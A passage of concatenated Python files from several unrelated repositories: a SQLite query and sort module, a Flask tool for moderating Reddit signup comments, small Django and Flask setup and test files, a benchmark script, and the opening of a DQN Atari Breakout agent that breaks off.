def __eq__(self, other):
return type(self) == type(other)
def __hash__(self):
return 0
class FieldQuery(Query):
"""An abstract query that searches in a specific field for a
pattern. Subclasses must provide a `value_match` class method, which
determines whether a certain pattern string matches a certain value
string. Subclasses may also provide `col_clause` to implement the
same matching functionality in SQLite.
"""
def __init__(self, field, pattern, fast=True):
self.field = field
self.pattern = pattern
self.fast = fast
def col_clause(self):
return None, ()
def clause(self):
if self.fast:
return self.col_clause()
else:
# Matching a flexattr. This is a slow query.
return None, ()
@classmethod
def value_match(cls, pattern, value):
"""Determine whether the value matches the pattern. Both
arguments are strings.
"""
raise NotImplementedError()
def match(self, item):
return self.value_match(self.pattern, item.get(self.field))
def __repr__(self):
return ("{0.__class__.__name__}({0.field!r}, {0.pattern!r}, "
"{0.fast})".format(self))
def __eq__(self, other):
return super().__eq__(other) and \
self.field == other.field and self.pattern == other.pattern
def __hash__(self):
return hash((self.field, hash(self.pattern)))
class MatchQuery(FieldQuery):
"""A query that looks for exact matches in an item field."""
def col_clause(self):
return self.field + " = ?", [self.pattern]
@classmethod
def value_match(cls, pattern, value):
return pattern == value
class NoneQuery(FieldQuery):
"""A query that checks whether a field is null."""
def __init__(self, field, fast=True):
super().__init__(field, None, fast)
def col_clause(self):
return self.field + " IS NULL", ()
def match(self, item):
return item.get(self.field) is None
def __repr__(self):
return "{0.__class__.__name__}({0.field!r}, {0.fast})".format(self)
class StringFieldQuery(FieldQuery):
"""A FieldQuery that converts values to strings before matching
them.
"""
@classmethod
def value_match(cls, pattern, value):
"""Determine whether the value matches the pattern. The value
may have any type.
"""
return cls.string_match(pattern, util.as_string(value))
@classmethod
def string_match(cls, pattern, value):
"""Determine whether the value matches the pattern. Both
arguments are strings. Subclasses implement this method.
"""
raise NotImplementedError()
class StringQuery(StringFieldQuery):
"""A query that matches a whole string in a specific item field."""
def col_clause(self):
search = (self.pattern
.replace('\\', '\\\\')
.replace('%', '\\%')
.replace('_', '\\_'))
clause = self.field + " like ? escape '\\'"
subvals = [search]
return clause, subvals
@classmethod
def string_match(cls, pattern, value):
return pattern.lower() == value.lower()
class SubstringQuery(StringFieldQuery):
"""A query that matches a substring in a specific item field."""
def col_clause(self):
pattern = (self.pattern
.replace('\\', '\\\\')
.replace('%', '\\%')
.replace('_', '\\_'))
search = '%' + pattern + '%'
clause = self.field + " like ? escape '\\'"
subvals = [search]
return clause, subvals
@classmethod
def string_match(cls, pattern, value):
return pattern.lower() in value.lower()
class RegexpQuery(StringFieldQuery):
"""A query that matches a regular expression in a specific item
field.
Raises InvalidQueryError when the pattern is not a valid regular
expression.
"""
def __init__(self, field, pattern, fast=True):
super().__init__(field, pattern, fast)
pattern = self._normalize(pattern)
try:
self.pattern = re.compile(self.pattern)
except re.error as exc:
# Invalid regular expression.
raise InvalidQueryArgumentValueError(pattern,
"a regular expression",
format(exc))
@staticmethod
def _normalize(s):
"""Normalize a Unicode string's representation (used on both
patterns and matched values).
"""
return unicodedata.normalize('NFC', s)
@classmethod
def string_match(cls, pattern, value):
return pattern.search(cls._normalize(value)) is not None
class BooleanQuery(MatchQuery):
"""Matches a boolean field. Pattern should either be a boolean or a
string reflecting a boolean.
"""
def __init__(self, field, pattern, fast=True):
super().__init__(field, pattern, fast)
if isinstance(pattern, str):
self.pattern = util.str2bool(pattern)
self.pattern = int(self.pattern)
class BytesQuery(MatchQuery):
"""Match a raw bytes field (i.e., a path). This is a necessary hack
to work around the `sqlite3` module's desire to treat `bytes` and
`unicode` equivalently in Python 2. Always use this query instead of
`MatchQuery` when matching on BLOB values.
"""
def __init__(self, field, pattern):
super().__init__(field, pattern)
# Use a buffer/memoryview representation of the pattern for SQLite
# matching. This instructs SQLite to treat the blob as binary
# rather than encoded Unicode.
if isinstance(self.pattern, (str, bytes)):
if isinstance(self.pattern, str):
self.pattern = self.pattern.encode('utf-8')
self.buf_pattern = memoryview(self.pattern)
elif isinstance(self.pattern, memoryview):
self.buf_pattern = self.pattern
self.pattern = bytes(self.pattern)
def col_clause(self):
return self.field + " = ?", [self.buf_pattern]
class NumericQuery(FieldQuery):
"""Matches numeric fields. A syntax using Ruby-style range ellipses
(``..``) lets users specify one- or two-sided ranges. For example,
``year:2001..`` finds music released since the turn of the century.
Raises InvalidQueryError when the pattern does not represent an int or
a float.
"""
def _convert(self, s):
"""Convert a string to a numeric type (float or int).
Return None if `s` is empty.
Raise an InvalidQueryError if the string cannot be converted.
"""
# This is really just a bit of fun premature optimization.
if not s:
return None
try:
return int(s)
except ValueError:
try:
return float(s)
except ValueError:
raise InvalidQueryArgumentValueError(s, "an int or a float")
def __init__(self, field, pattern, fast=True):
super().__init__(field, pattern, fast)
parts = pattern.split('..', 1)
if len(parts) == 1:
# No range.
self.point = self._convert(parts[0])
self.rangemin = None
self.rangemax = None
else:
# One- or two-sided range.
self.point = None
self.rangemin = self._convert(parts[0])
self.rangemax = self._convert(parts[1])
def match(self, item):
if self.field not in item:
return False
value = item[self.field]
if isinstance(value, str):
value = self._convert(value)
if self.point is not None:
return value == self.point
else:
if self.rangemin is not None and value < self.rangemin:
return False
if self.rangemax is not None and value > self.rangemax:
return False
return True
def col_clause(self):
if self.point is not None:
return self.field + '=?', (self.point,)
else:
if self.rangemin is not None and self.rangemax is not None:
return ('{0} >= ? AND {0} <= ?'.format(self.field),
(self.rangemin, self.rangemax))
elif self.rangemin is not None:
return f'{self.field} >= ?', (self.rangemin,)
elif self.rangemax is not None:
return f'{self.field} <= ?', (self.rangemax,)
else:
return '1', ()
class CollectionQuery(Query):
"""An abstract query class that aggregates other queries. Can be
indexed like a list to access the sub-queries.
"""
def __init__(self, subqueries=()):
self.subqueries = subqueries
# Act like a sequence.
def __len__(self):
return len(self.subqueries)
def __getitem__(self, key):
return self.subqueries[key]
def __iter__(self):
return iter(self.subqueries)
def __contains__(self, item):
return item in self.subqueries
def clause_with_joiner(self, joiner):
"""Return a clause created by joining together the clauses of
all subqueries with the string joiner (padded by spaces).
"""
clause_parts = []
subvals = []
for subq in self.subqueries:
subq_clause, subq_subvals = subq.clause()
if not subq_clause:
# Fall back to slow query.
return None, ()
clause_parts.append('(' + subq_clause + ')')
subvals += subq_subvals
clause = (' ' + joiner + ' ').join(clause_parts)
return clause, subvals
def __repr__(self):
return "{0.__class__.__name__}({0.subqueries!r})".format(self)
def __eq__(self, other):
return super().__eq__(other) and \
self.subqueries == other.subqueries
def __hash__(self):
"""Since subqueries are mutable, this object should not be hashable.
However and for conveniences purposes, it can be hashed.
"""
return reduce(mul, map(hash, self.subqueries), 1)
class AnyFieldQuery(CollectionQuery):
"""A query that matches if a given FieldQuery subclass matches in
any field. The individual field query class is provided to the
constructor.
"""
def __init__(self, pattern, fields, cls):
self.pattern = pattern
self.fields = fields
self.query_class = cls
subqueries = []
for field in self.fields:
subqueries.append(cls(field, pattern, True))
super().__init__(subqueries)
def clause(self):
return self.clause_with_joiner('or')
def match(self, item):
for subq in self.subqueries:
if subq.match(item):
return True
return False
def __repr__(self):
return ("{0.__class__.__name__}({0.pattern!r}, {0.fields!r}, "
"{0.query_class.__name__})".format(self))
def __eq__(self, other):
return super().__eq__(other) and \
self.query_class == other.query_class
def __hash__(self):
return hash((self.pattern, tuple(self.fields), self.query_class))
class MutableCollectionQuery(CollectionQuery):
"""A collection query whose subqueries may be modified after the
query is initialized.
"""
def __setitem__(self, key, value):
self.subqueries[key] = value
def __delitem__(self, key):
del self.subqueries[key]
class AndQuery(MutableCollectionQuery):
"""A conjunction of a list of other queries."""
def clause(self):
return self.clause_with_joiner('and')
def match(self, item):
return all(q.match(item) for q in self.subqueries)
class OrQuery(MutableCollectionQuery):
"""A conjunction of a list of other queries."""
def clause(self):
return self.clause_with_joiner('or')
def match(self, item):
return any(q.match(item) for q in self.subqueries)
class NotQuery(Query):
"""A query that matches the negation of its `subquery`, as a shorcut for
performing `not(subquery)` without using regular expressions.
"""
def __init__(self, subquery):
self.subquery = subquery
def clause(self):
clause, subvals = self.subquery.clause()
if clause:
return f'not ({clause})', subvals
else:
# If there is no clause, there is nothing to negate. All the logic
# is handled by match() for slow queries.
return clause, subvals
def match(self, item):
return not self.subquery.match(item)
def __repr__(self):
return "{0.__class__.__name__}({0.subquery!r})".format(self)
def __eq__(self, other):
return super().__eq__(other) and \
self.subquery == other.subquery
def __hash__(self):
return hash(('not', hash(self.subquery)))
class TrueQuery(Query):
"""A query that always matches."""
def clause(self):
return '1', ()
def match(self, item):
return True
class FalseQuery(Query):
"""A query that never matches."""
def clause(self):
return '0', ()
def match(self, item):
return False
# Time/date queries.
def _to_epoch_time(date):
"""Convert a `datetime` object to an integer number of seconds since
the (local) Unix epoch.
"""
if hasattr(date, 'timestamp'):
# The `timestamp` method exists on Python 3.3+.
return int(date.timestamp())
else:
epoch = datetime.fromtimestamp(0)
delta = date - epoch
return int(delta.total_seconds())
def _parse_periods(pattern):
"""Parse a string containing two dates separated by two dots (..).
Return a pair of `Period` objects.
"""
parts = pattern.split('..', 1)
if len(parts) == 1:
instant = Period.parse(parts[0])
return (instant, instant)
else:
start = Period.parse(parts[0])
end = Period.parse(parts[1])
return (start, end)
class Period:
"""A period of time given by a date, time and precision.
Example: 2014-01-01 10:50:30 with precision 'month' represents all
instants of time during January 2014.
"""
precisions = ('year', 'month', 'day', 'hour', 'minute', 'second')
date_formats = (
('%Y',), # year
('%Y-%m',), # month
('%Y-%m-%d',), # day
('%Y-%m-%dT%H', '%Y-%m-%d %H'), # hour
('%Y-%m-%dT%H:%M', '%Y-%m-%d %H:%M'), # minute
('%Y-%m-%dT%H:%M:%S', '%Y-%m-%d %H:%M:%S') # second
)
relative_units = {'y': 365, 'm': 30, 'w': 7, 'd': 1}
relative_re = '(?P<sign>[+|-]?)(?P<quantity>[0-9]+)' + \
'(?P<timespan>[y|m|w|d])'
def __init__(self, date, precision):
"""Create a period with the given date (a `datetime` object) and
precision (a string, one of "year", "month", "day", "hour", "minute",
or "second").
"""
if precision not in Period.precisions:
raise ValueError(f'Invalid precision {precision}')
self.date = date
self.precision = precision
@classmethod
def parse(cls, string):
"""Parse a date and return a `Period` object or `None` if the
string is empty, or raise an InvalidQueryArgumentValueError if
the string cannot be parsed to a date.
The date may be absolute or relative. Absolute dates look like
`YYYY`, or `YYYY-MM-DD`, or `YYYY-MM-DD HH:MM:SS`, etc. Relative
dates have three parts:
- Optionally, a ``+`` or ``-`` sign indicating the future or the
past. The default is the future.
- A number: how much to add or subtract.
- A letter indicating the unit: days, weeks, months or years
(``d``, ``w``, ``m`` or ``y``). A "month" is exactly 30 days
and a "year" is exactly 365 days.
"""
def find_date_and_format(string):
for ord, format in enumerate(cls.date_formats):
for format_option in format:
try:
date = datetime.strptime(string, format_option)
return date, ord
except ValueError:
# Parsing failed.
pass
return (None, None)
if not string:
return None
# Check for a relative date.
match_dq = re.match(cls.relative_re, string)
if match_dq:
sign = match_dq.group('sign')
quantity = match_dq.group('quantity')
timespan = match_dq.group('timespan')
# Add or subtract the given amount of time from the current
# date.
multiplier = -1 if sign == '-' else 1
days = cls.relative_units[timespan]
date = datetime.now() + \
timedelta(days=int(quantity) * days) * multiplier
return cls(date, cls.precisions[5])
# Check for an absolute date.
date, ordinal = find_date_and_format(string)
if date is None:
raise InvalidQueryArgumentValueError(string,
'a valid date/time string')
precision = cls.precisions[ordinal]
return cls(date, precision)
def open_right_endpoint(self):
"""Based on the precision, convert the period to a precise
`datetime` for use as a right endpoint in a right-open interval.
"""
precision = self.precision
date = self.date
if 'year' == self.precision:
return date.replace(year=date.year + 1, month=1)
elif 'month' == precision:
if (date.month < 12):
return date.replace(month=date.month + 1)
else:
return date.replace(year=date.year + 1, month=1)
elif 'day' == precision:
return date + timedelta(days=1)
elif 'hour' == precision:
return date + timedelta(hours=1)
elif 'minute' == precision:
return date + timedelta(minutes=1)
elif 'second' == precision:
return date + timedelta(seconds=1)
else:
raise ValueError(f'unhandled precision {precision}')
class DateInterval:
"""A closed-open interval of dates.
A left endpoint of None means since the beginning of time.
A right endpoint of None means towards infinity.
"""
def __init__(self, start, end):
if start is not None and end is not None and not start < end:
raise ValueError("start date {} is not before end date {}"
.format(start, end))
self.start = start
self.end = end
@classmethod
def from_periods(cls, start, end):
"""Create an interval with two Periods as the endpoints.
"""
end_date = end.open_right_endpoint() if end is not None else None
start_date = start.date if start is not None else None
return cls(start_date, end_date)
def contains(self, date):
if self.start is not None and date < self.start:
return False
if self.end is not None and date >= self.end:
return False
return True
def __str__(self):
return f'[{self.start}, {self.end})'
class DateQuery(FieldQuery):
"""Matches date fields stored as seconds since Unix epoch time.
Dates can be specified as ``year-month-day`` strings where only year
is mandatory.
The value of a date field can be matched against a date interval by
using an ellipsis interval syntax similar to that of NumericQuery.
"""
def __init__(self, field, pattern, fast=True):
super().__init__(field, pattern, fast)
start, end = _parse_periods(pattern)
self.interval = DateInterval.from_periods(start, end)
def match(self, item):
if self.field not in item:
return False
timestamp = float(item[self.field])
date = datetime.fromtimestamp(timestamp)
return self.interval.contains(date)
_clause_tmpl = "{0} {1} ?"
def col_clause(self):
clause_parts = []
subvals = []
if self.interval.start:
clause_parts.append(self._clause_tmpl.format(self.field, ">="))
subvals.append(_to_epoch_time(self.interval.start))
if self.interval.end:
clause_parts.append(self._clause_tmpl.format(self.field, "<"))
subvals.append(_to_epoch_time(self.interval.end))
if clause_parts:
# One- or two-sided interval.
clause = ' AND '.join(clause_parts)
else:
# Match any date.
clause = '1'
return clause, subvals
class DurationQuery(NumericQuery):
"""NumericQuery that allow human-friendly (M:SS) time interval formats.
Converts the range(s) to a float value, and delegates on NumericQuery.
Raises InvalidQueryError when the pattern does not represent an int, float
or M:SS time interval.
"""
def _convert(self, s):
"""Convert a M:SS or numeric string to a float.
Return None if `s` is empty.
Raise an InvalidQueryError if the string cannot be converted.
"""
if not s:
return None
try:
return util.raw_seconds_short(s)
except ValueError:
try:
return float(s)
except ValueError:
raise InvalidQueryArgumentValueError(
s,
"a M:SS string or a float")
# Sorting.
class Sort:
"""An abstract class representing a sort operation for a query into
the item database.
"""
def order_clause(self):
"""Generates a SQL fragment to be used in a ORDER BY clause, or
None if no fragment is used (i.e., this is a slow sort).
"""
return None
def sort(self, items):
"""Sort the list of objects and return a list.
"""
return sorted(items)
def is_slow(self):
"""Indicate whether this query is *slow*, meaning that it cannot
be executed in SQL and must be executed in Python.
"""
return False
def __hash__(self):
return 0
def __eq__(self, other):
return type(self) == type(other)
class MultipleSort(Sort):
"""Sort that encapsulates multiple sub-sorts.
"""
def __init__(self, sorts=None):
self.sorts = sorts or []
def add_sort(self, sort):
self.sorts.append(sort)
def _sql_sorts(self):
"""Return the list of sub-sorts for which we can be (at least
partially) fast.
A contiguous suffix of fast (SQL-capable) sub-sorts are
executable in SQL. The remaining, even if they are fast
independently, must be executed slowly.
"""
sql_sorts = []
for sort in reversed(self.sorts):
if not sort.order_clause() is None:
sql_sorts.append(sort)
else:
break
sql_sorts.reverse()
return sql_sorts
def order_clause(self):
order_strings = []
for sort in self._sql_sorts():
order = sort.order_clause()
order_strings.append(order)
return ", ".join(order_strings)
def is_slow(self):
for sort in self.sorts:
if sort.is_slow():
return True
return False
def sort(self, items):
slow_sorts = []
switch_slow = False
for sort in reversed(self.sorts):
if switch_slow:
slow_sorts.append(sort)
elif sort.order_clause() is None:
switch_slow = True
slow_sorts.append(sort)
else:
pass
for sort in slow_sorts:
items = sort.sort(items)
return items
def __repr__(self):
return f'MultipleSort({self.sorts!r})'
def __hash__(self):
return hash(tuple(self.sorts))
def __eq__(self, other):
return super().__eq__(other) and \
self.sorts == other.sorts
class FieldSort(Sort):
"""An abstract sort criterion that orders by a specific field (of
any kind).
"""
def __init__(self, field, ascending=True, case_insensitive=True):
self.field = field
self.ascending = ascending
self.case_insensitive = case_insensitive
def sort(self, objs):
# TODO: Conversion and null-detection here. In Python 3,
# comparisons with None fail. We should also support flexible
# attributes with different types without falling over.
def key(item):
field_val = item.get(self.field, '')
if self.case_insensitive and isinstance(field_val, str):
field_val = field_val.lower()
return field_val
return sorted(objs, key=key, reverse=not self.ascending)
def __repr__(self):
return '<{}: {}{}>'.format(
type(self).__name__,
self.field,
'+' if self.ascending else '-',
)
def __hash__(self):
return hash((self.field, self.ascending))
def __eq__(self, other):
return super().__eq__(other) and \
self.field == other.field and \
self.ascending == other.ascending
class FixedFieldSort(FieldSort):
"""Sort object to sort on a fixed field.
"""
def order_clause(self):
order = "ASC" if self.ascending else "DESC"
if self.case_insensitive:
field = '(CASE ' \
'WHEN TYPEOF({0})="text" THEN LOWER({0}) ' \
'WHEN TYPEOF({0})="blob" THEN LOWER({0}) ' \
'ELSE {0} END)'.format(self.field)
else:
field = self.field
return f"{field} {order}"
class SlowFieldSort(FieldSort):
"""A sort criterion by some model field other than a fixed field:
i.e., a computed or flexible field.
"""
def is_slow(self):
return True
class NullSort(Sort):
"""No sorting. Leave results unsorted."""
def sort(self, items):
return items
def __nonzero__(self):
return self.__bool__()
def __bool__(self):
return False
def __eq__(self, other):
return type(self) == type(other) or other is None
def __hash__(self):
return 0
|
foobarbazblarg/stayclean
|
stayclean-2018-march/serve-signups-with-flask.py
|
#!/usr/bin/env python
import subprocess
import praw
from hashlib import sha1
from flask import Flask
from flask import Response
from flask import request
from cStringIO import StringIO
from base64 import b64encode
from base64 import b64decode
from ConfigParser import ConfigParser
import OAuth2Util
import os
import markdown
import bleach
# encoding=utf8
import sys
from participantCollection import ParticipantCollection
reload(sys)
sys.setdefaultencoding('utf8')
# Edit Me!
# Each day after you post a signup post, copy its 6-character ID to this array.
signupPageSubmissionIds = [ '7zrrj1', '7zxkpq', '8055hn', '80ddrf', '80nbm1', '80waq3' ]
flaskport = 8993
app = Flask(__name__)
app.debug = True
commentHashesAndComments = {}
def loginAndReturnRedditSession():
config = ConfigParser()
config.read("../reddit-password-credentials.cfg")
user = config.get("Reddit", "user")
password = config.get("Reddit", "password")
# TODO: password auth is going away, and we will soon need to do oauth.
redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
redditSession.login(user, password, disable_warning=True)
# submissions = redditSession.get_subreddit('pornfree').get_hot(limit=5)
# print [str(x) for x in submissions]
return redditSession
def loginOAuthAndReturnRedditSession():
redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
# New version of praw does not require explicit use of the OAuth2Util object. Presumably because reddit now REQUIRES oauth.
# o = OAuth2Util.OAuth2Util(redditSession, print_log=True, configfile="../reddit-oauth-credentials.cfg")
# TODO: Testing comment of refresh. We authenticate fresh every time, so presumably no need to do o.refresh().
# o.refresh(force=True)
return redditSession
def getSubmissionsForRedditSession(redditSession):
# submissions = [redditSession.get_submission(submission_id=submissionId) for submissionId in signupPageSubmissionIds]
submissions = [redditSession.submission(id=submissionId) for submissionId in signupPageSubmissionIds]
for submission in submissions:
submission.comments.replace_more(limit=None)
# submission.replace_more_comments(limit=None, threshold=0)
return submissions
def getCommentsForSubmissions(submissions):
comments = []
for submission in submissions:
commentForest = submission.comments
comments += [comment for comment in commentForest.list() if comment.__class__ == praw.models.Comment]
return comments
def retireCommentHash(commentHash):
with open("retiredcommenthashes.txt", "a") as commentHashFile:
commentHashFile.write(commentHash + '\n')
def retiredCommentHashes():
with open("retiredcommenthashes.txt", "r") as commentHashFile:
# return commentHashFile.readlines()
return commentHashFile.read().splitlines()
@app.route('/moderatesignups.html')
def moderatesignups():
global commentHashesAndComments
commentHashesAndComments = {}
stringio = StringIO()
stringio.write('<html>\n<head>\n</head>\n\n')
# redditSession = loginAndReturnRedditSession()
redditSession = loginOAuthAndReturnRedditSession()
submissions = getSubmissionsForRedditSession(redditSession)
flat_comments = getCommentsForSubmissions(submissions)
retiredHashes = retiredCommentHashes()
i = 1
stringio.write('<iframe name="invisibleiframe" style="display:none;"></iframe>\n')
stringio.write("<h3>")
stringio.write(os.getcwd())
stringio.write("<br>\n")
for submission in submissions:
stringio.write(submission.title)
stringio.write("<br>\n")
stringio.write("</h3>\n\n")
stringio.write('<form action="copydisplayduringsignuptoclipboard.html" method="post" target="invisibleiframe">')
stringio.write('<input type="submit" value="Copy display-during-signup.py stdout to clipboard">')
stringio.write('</form>')
for comment in flat_comments:
# print comment.is_root
# print comment.score
i += 1
commentHash = sha1()
commentHash.update(comment.fullname)
commentHash.update(comment.body.encode('utf-8'))
commentHash = commentHash.hexdigest()
if commentHash not in retiredHashes:
commentHashesAndComments[commentHash] = comment
authorName = str(comment.author) # can be None if author was deleted. So check for that and skip if it's None.
stringio.write("<hr>\n")
stringio.write('<font color="blue"><b>')
stringio.write(authorName) # can be None if author was deleted. So check for that and skip if it's None.
stringio.write('</b></font><br>')
if ParticipantCollection().hasParticipantNamed(authorName):
stringio.write(' <small><font color="green">(member)</font></small>')
# if ParticipantCollection().participantNamed(authorName).isStillIn:
# stringio.write(' <small><font color="green">(in)</font></small>')
# else:
# stringio.write(' <small><font color="red">(out)</font></small>')
else:
stringio.write(' <small><font color="red">(not a member)</font></small>')
stringio.write('<form action="takeaction.html" method="post" target="invisibleiframe">')
stringio.write('<input type="submit" name="actiontotake" value="Signup" style="color:white;background-color:green">')
# stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin">')
# stringio.write('<input type="submit" name="actiontotake" value="Relapse">')
# stringio.write('<input type="submit" name="actiontotake" value="Reinstate">')
stringio.write('<input type="submit" name="actiontotake" value="Skip comment">')
stringio.write('<input type="submit" name="actiontotake" value="Skip comment and don\'t upvote">')
stringio.write('<input type="hidden" name="username" value="' + b64encode(authorName) + '">')
stringio.write('<input type="hidden" name="commenthash" value="' + commentHash + '">')
# stringio.write('<input type="hidden" name="commentpermalink" value="' + comment.permalink + '">')
stringio.write('</form>')
stringio.write(bleach.clean(markdown.markdown(comment.body.encode('utf-8')), tags=['p']))
stringio.write("\n<br><br>\n\n")
stringio.write('</html>')
pageString = stringio.getvalue()
stringio.close()
return Response(pageString, mimetype='text/html')
@app.route('/takeaction.html', methods=["POST"])
def takeaction():
username = b64decode(request.form["username"])
commentHash = str(request.form["commenthash"])
# commentPermalink = request.form["commentpermalink"]
actionToTake = request.form["actiontotake"]
# print commentHashesAndComments
comment = commentHashesAndComments[commentHash]
# print "comment: " + str(comment)
if actionToTake == 'Signup':
print "signup - " + username
subprocess.call(['./signup.py', username])
comment.upvote()
retireCommentHash(commentHash)
# if actionToTake == 'Signup and checkin':
# print "signup and checkin - " + username
# subprocess.call(['./signup-and-checkin.sh', username])
# comment.upvote()
# retireCommentHash(commentHash)
# elif actionToTake == 'Relapse':
# print "relapse - " + username
# subprocess.call(['./relapse.py', username])
# comment.upvote()
# retireCommentHash(commentHash)
# elif actionToTake == 'Reinstate':
# print "reinstate - " + username
# subprocess.call(['./reinstate.py', username])
# comment.upvote()
# retireCommentHash(commentHash)
elif actionToTake == 'Skip comment':
print "Skip comment - " + username
comment.upvote()
retireCommentHash(commentHash)
elif actionToTake == "Skip comment and don't upvote":
print "Skip comment and don't upvote - " + username
retireCommentHash(commentHash)
return Response("hello", mimetype='text/html')
@app.route('/copydisplayduringsignuptoclipboard.html', methods=["POST"])
def copydisplayduringsignuptoclipboard():
print "TODO: Copy display to clipboard"
subprocess.call(['./display-during-signup.py'])
return Response("hello", mimetype='text/html')
if __name__ == '__main__':
app.run(host='127.0.0.1', port=flaskport)
|
viniciuschiele/flask-webapi
|
tests/test_status.py
|
from flask_webapi import status
from unittest import TestCase
class TestStatus(TestCase):
def test_is_informational(self):
self.assertFalse(status.is_informational(99))
self.assertFalse(status.is_informational(200))
for i in range(100, 199):
self.assertTrue(status.is_informational(i))
def test_is_success(self):
self.assertFalse(status.is_success(199))
self.assertFalse(status.is_success(300))
for i in range(200, 299):
self.assertTrue(status.is_success(i))
def test_is_redirect(self):
self.assertFalse(status.is_redirect(299))
self.assertFalse(status.is_redirect(400))
for i in range(300, 399):
self.assertTrue(status.is_redirect(i))
def test_is_client_error(self):
self.assertFalse(status.is_client_error(399))
self.assertFalse(status.is_client_error(500))
for i in range(400, 499):
self.assertTrue(status.is_client_error(i))
def test_is_server_error(self):
self.assertFalse(status.is_server_error(499))
self.assertFalse(status.is_server_error(600))
for i in range(500, 599):
self.assertTrue(status.is_server_error(i))
|
Alex-Just/gymlog
|
gymlog/main/tests/test_models.py
|
# from test_plus.test import TestCase
#
#
# class TestUser(TestCase):
#
# def setUp(self):
# self.user = self.make_user()
#
# def test__str__(self):
# self.assertEqual(
# self.user.__str__(),
# 'testuser' # This is the default username for self.make_user()
# )
#
# def test_get_absolute_url(self):
# self.assertEqual(
# self.user.get_absolute_url(),
# '/users/testuser/'
# )
|
jminuscula/dixit-online
|
server/src/dixit/api/auth/serializers/user.py
|
from rest_framework import serializers
from django.contrib.auth.models import User
from dixit.account.models import UserProfile
class UserProfileSerializer(serializers.ModelSerializer):
class Meta:
model = UserProfile
fields = ('name', )
class UserSerializer(serializers.ModelSerializer):
"""
Serializes User objects
"""
profile = UserProfileSerializer()
class Meta:
model = User
fields = ('id', 'username', 'email', 'profile', )
|
simonz05/pack-command
|
misc/bench.py
|
# -*- coding: utf-8 -*-
import pack_command
import pack_command_python
import timeit
import cProfile
import pstats
import pycallgraph
def format_time(seconds):
v = seconds
if v * 1000 * 1000 * 1000 < 1000:
scale = u'ns'
v = int(round(v*1000*1000*1000))
elif v * 1000 * 1000 < 1000:
scale = u'μs'
v = int(round(v*1000*1000))
elif v * 1000 < 1000:
scale = u'ms'
v = round(v*1000, 4)
else:
scale = u'sec'
v = int(v)
return u'{} {}'.format(v, scale)
# profiler size
number = 100000
sample = 7
# profiler type
profile = False
graph = False
timer = True
def runit():
pack_command.pack_command("ZADD", "foo", 1369198341, 10000)
def runitp():
pack_command_python.pack_command("ZADD", "foo", 1369198341, 10000)
if profile:
pr = cProfile.Profile()
pr.enable()
if graph:
pycallgraph.start_trace()
if timer:
for name, t in (("Python", runitp), ("cython", runit)):
res = timeit.Timer(t).repeat(sample, number)
min_run = min(res)
per_loop = min_run/number
print u'{}'.format(name)
print u'{} total run'.format(format_time(min_run))
print u'{} per/loop'.format(format_time(per_loop))
#print u'{} per/friend'.format(format_time(per_loop/friends_cnt))
else:
for j in xrange(number):
runit()
if graph:
pycallgraph.make_dot_graph('example.png')
if profile:
pr.disable()
ps = pstats.Stats(pr)
sort_by = 'cumulative'
ps.strip_dirs().sort_stats(sort_by).print_stats(20)
|
nwinter/bantling
|
src/application/__init__.py
|
"""
Initialize Flask app
"""
from flask import Flask
import os
from flask_debugtoolbar import DebugToolbarExtension
from werkzeug.debug import DebuggedApplication
app = Flask('application')
if os.getenv('FLASK_CONF') == 'DEV':
# Development settings
app.config.from_object('application.settings.Development')
# Flask-DebugToolbar
toolbar = DebugToolbarExtension(app)
# Google app engine mini profiler
# https://github.com/kamens/gae_mini_profiler
app.wsgi_app = DebuggedApplication(app.wsgi_app, evalex=True)
from gae_mini_profiler import profiler, templatetags
@app.context_processor
def inject_profiler():
return dict(profiler_includes=templatetags.profiler_includes())
app.wsgi_app = profiler.ProfilerWSGIMiddleware(app.wsgi_app)
elif os.getenv('FLASK_CONF') == 'TEST':
app.config.from_object('application.settings.Testing')
else:
app.config.from_object('application.settings.Production')
# Enable jinja2 loop controls extension
app.jinja_env.add_extension('jinja2.ext.loopcontrols')
# Pull in URL dispatch routes
import urls
|
bennybauer/pinax-hello
|
runtests.py
|
#!/usr/bin/env python
import os
import sys
import django
from django.conf import settings
DEFAULT_SETTINGS = dict(
INSTALLED_APPS=[
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sites",
"pinax.pinax_hello",
"pinax.pinax_hello.tests"
],
MIDDLEWARE_CLASSES=[],
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": ":memory:",
}
},
SITE_ID=1,
ROOT_URLCONF="pinax.pinax_hello.tests.urls",
SECRET_KEY="notasecret",
)
def runtests(*test_args):
if not settings.configured:
settings.configure(**DEFAULT_SETTINGS)
django.setup()
parent = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, parent)
try:
from django.test.runner import DiscoverRunner
runner_class = DiscoverRunner
test_args = ["pinax.pinax_hello.tests"]
except ImportError:
from django.test.simple import DjangoTestSuiteRunner
runner_class = DjangoTestSuiteRunner
test_args = ["tests"]
failures = runner_class(verbosity=1, interactive=True, failfast=False).run_tests(test_args)
sys.exit(failures)
if __name__ == "__main__":
runtests(*sys.argv[1:])
|
tuzzer/ai-gym
|
atari_breakout/atari_breakout_dqn_cntk.py
|
import random
import numpy as np
import math
from time import perf_counter
import os
import sys
from collections import deque
import gym
import cntk
from cntk.layers import Convolution, MaxPooling, Dense
from cntk.models import Sequential, LayerStack
from cntk.initializer import glorot_normal
env = gym.make("Breakout-v0")
NUM_ACTIONS = env.action_space.n
SCREEN_H_ORIG, SCREEN_W_ORIG, NUM_COLOUR_CHANNELS = env.observation_space.shape
def preprocess_image(screen_image):
# crop the top and bottom
screen_image = screen_image[35:195]
# down sample by a factor of 2
screen_image = screen_image[::2, ::2]
# convert to grey scale
grey_image = np.zeros(screen_image.shape[0:2])
for i in range(len(screen_image)):
for j in range(len(screen_image[i])):
grey_image[i][j] = np.mean(screen_image[i][j])
return np.array([grey_image.astype(np.float)])
CHANNELS, IMAGE_H, IMAGE_W = preprocess_image(np.zeros((SCREEN_H_ORIG, SCREEN_W_ORIG))).shape
STATE_DIMS = (1, IMAGE_H, IMAGE_W)
class Brain:
BATCH_SIZE = 5
def __init__(self):
#### Construct the model ####
observation = cntk.ops.input_variable(STATE_DIMS, np.float32, name="s")
q_target = cntk.ops.input_variable(NUM_ACTIONS, np.float32, name="q")
# Define the structure of the neural network
self.model = self.create_convolutional_neural_network(observation, NUM_ACTIONS)
#### Define the trainer ####
